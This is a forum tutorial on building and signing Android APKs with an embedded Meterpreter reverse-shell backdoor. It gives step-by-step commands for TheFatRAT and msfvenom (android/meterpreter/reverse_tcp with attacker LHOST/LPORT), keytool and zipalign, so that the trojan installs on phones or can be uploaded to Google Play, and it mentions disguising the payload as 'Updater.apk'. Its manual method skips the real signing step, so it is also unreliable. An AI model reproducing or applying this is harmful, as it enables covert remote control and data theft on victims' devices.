How to: Sign the APK File with Embedded Payload (The Ultimate Guide)

Hi My Fellow H4CK3Rs

  • Today, I`m gonna show you: "How To Sign the APK File with Embedded Payload". The following Methods work 100%. So, Follow the steps carefully. But before getting started, if you are a beginner, then read the following Answers first...

Q: Why we have to Sign the APK File?

In Modern Android Phones, Un-Signed APK files can be Easily installed. But Older versions of Android does not Support the installation of Unsigned APK files. This is not a common Problem. But for Publishers and Hackers, it can create a lot of problem, because Unsigned APK files give error on Older Android Versions & cannot be EVEN Uploaded on Google Play or Play Store.

To Manually & Properly Sign the APK, you have to Follow the Following steps Carefully!

DISCLAIMER : This Thread is only for Education Purposes. I will not be Responsible of Any Illegal use of this information. Try not to HACK the Androids, other than your`s.

Q: How to Sign APK File?

Signing the APK is not so Difficult. You have to be Patient, and Comment below if you face any problems or errors. So, I`ve listed THREE Methods below to Sign the APK FILE. Method#1 is Easy but requires 700mb of disc space for installing required files, Method#2 is a bit Difficult but does`nt requires much space, but Method #3 is EASIEST Method of signing the APK File (It can only be done on android) .

  • So Lets Start ...

Method #1: Using TheFatRAT

Requirements

1). Kali LinuX (Latest Version is Preferred)
2). TheFatRAT (Installation instructions are Discussed Below)
3). At Least 500mb Internet Data (For Proper Downloading of TheFatRAT)

Installation

1). First You Have to Download TheFatRAT. For this, enter the following command on Terminal :
git clone github.com/Screetsec/TheFatRat.git
Now the Downloading of TheFatRAT will get start. Remember, it will install in your ROOT folder.

2). When the Downloading Complete, (In Same Terminal) Enter :
cd TheFatRat
Then :
chmod +x setup.sh && ./setup.sh
Now wait till it Install its Components. It may take a while.

More Information About TheFatRAT can be found here :
github.com/Screetsec/TheFatRat

Signing the APK File

First of all, Remember that Option #5 of TheFatRAT does not works properly. So ignore it.

1). When Installation of TheFatRAT Completes, Open a new Terminal, and Enter:

fatrat

(Just Like we enter msfconsole etc)
Wait till it load its components Completely and the following Screen Appear.

2). Select Option #1 , (To select, Just type 1 and press Enter)

After Selecting 1, It may look like this:
3). Select Option #3

4). Select your IPv4 Address in Set LHOST IP: (I`m typing LHOST: 0.0.0.0 for example) and Your desired port in Set LPORT: (You can Type 4444 or 8080)

If you don`t know how to find IP address, Visit WhatIsMyIP Website , (I think you already knew that :)

5). After Entering your IP & Port, Enter Desired name for output file (i.e. payloadapk) when it ask.

6). Now Select one of 1st three Options (Option #3 is preferred)

7). Now wait till it Completely Generate SIGNED APK File. If you see Following Screen:

Then ,
|==================>DONE <================|
| You have Successfully Generated SIGNED APK |
|==================> FILE <=================|

Location

Your SIGNED Apk File, with Embedded Payload can be found here :
/root/TheFatRat/backdoored/payloadapk.apk

Method #2: Signing APK Manually

Image via yeahhub.com

Requirements

1). Kali LinuX (Latest Version is Preferred)
2). Java v8 or above (Latest Version is Preferred)
3). ZipAlign Tool (Download it HERE , Install instructions included)

Installation

1). Latest version of JAVA is already installed in Kali LinuX. So you don`t need to download it Manually.

2). Zip-Align Tool can be found HERE. Installation instructions are Discussed there. If you have any Problems, Try 1st Method or Post them in Comments Section.

3). Here I am gonna Generate a Key named key.jks for payloadapk.apk , which is already generated by msfvenom command

Signing the APK File Manually

1). First, generate an Un-Signed APK File with Embedded Payload:
msfvenom -p android/meterpreter/reverse_tcp LHOST=(your-IP) LPORT=(desired-port) R > payloadapk.apk

2). Now we are gonna Generate a key key.jks with KeyTool. For this, type in Terminal (Screenshot Below):
keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias my-alias

3). Enter a Remember-able KeyStore Password. (i.e. 123456)

4). Now, it will ask about your Personnel Information. Just Randomly fill the Form (i.e. 777), and finally Type: yes , This will Successfully Generate a key.

6). BINGO...!!!!!!!! APK file has been signed. Now the most important step; Zip Aligning is Left, Just type the following command in terminal, and GET the Signed payloadapk.apk:

zipalign -v 4 payloadapk.apk payloadapk-Signed.apk

|==================>DONE <================|
| You have Successfully Generated SIGNED APK |
|==================> FILE <=================|

Location

Your Manually SIGNED Apk File, with Embedded Payload can be found here :
/root/payloadapk-Signed.apk

Method #3: Signing APK on Android

Image via dlandroid.com

Requirements

1). MiXplorer File Explorer (Download latest version from UpToDown Website)

2). MiX Signer (Download it from Play Store)

Steps to Sign APK File

  • Download MiXplorer File Explorer.
  • Download its Addon: MiX Signer (Both links are already posted above)
  • After that, just open MiXplorer File Manager and head to Un-Signed APK File (here, I named it as Updater.apk).
  • Long Press on Un-Signed APK File and select MENU button on top right corner of MiXplorer, then select SIGN.
  • It will display variety of options to sign APK File (AUTO is preferred).
  • Select AUTO (for example) to Automatically & Successfully sign the apk file.
  • Now, your APK file: (filename)-signed.apk is successfully signed and fully functional, also is of 9.9KB of size!.

Note: I`ve done a lot of work to get this information from the whole internet, and finally got these three Solutions. There is also another Method to sign the apk file, and that is; using Android Development Kit. Its Size was too large, so I did`nt downloaded it and find these Alternative ways of signing APK file, which are much easier than Android Development Kit. Anyway, if you find errors or you think I`ve missed something, then tell me in Comments Section. I will fix that as soon as possible. One thing I`ve not told before, THIS IS MY FIRST EVER POST ON INTERNET ...!!! Thanks for reading my thread (You can also join our WhatsApp Group for more information and Guides). BEST OF LUCK ...!!!

If You Liked My Guide, Then Don't Forget to Give Feedback ...!!!

!!!...===> Best Of Luck <===...!!!

1 Response

Neither github working nor zipalign working (it says that keyalg is illegal option

Share Your Thoughts

  • Hot
  • Active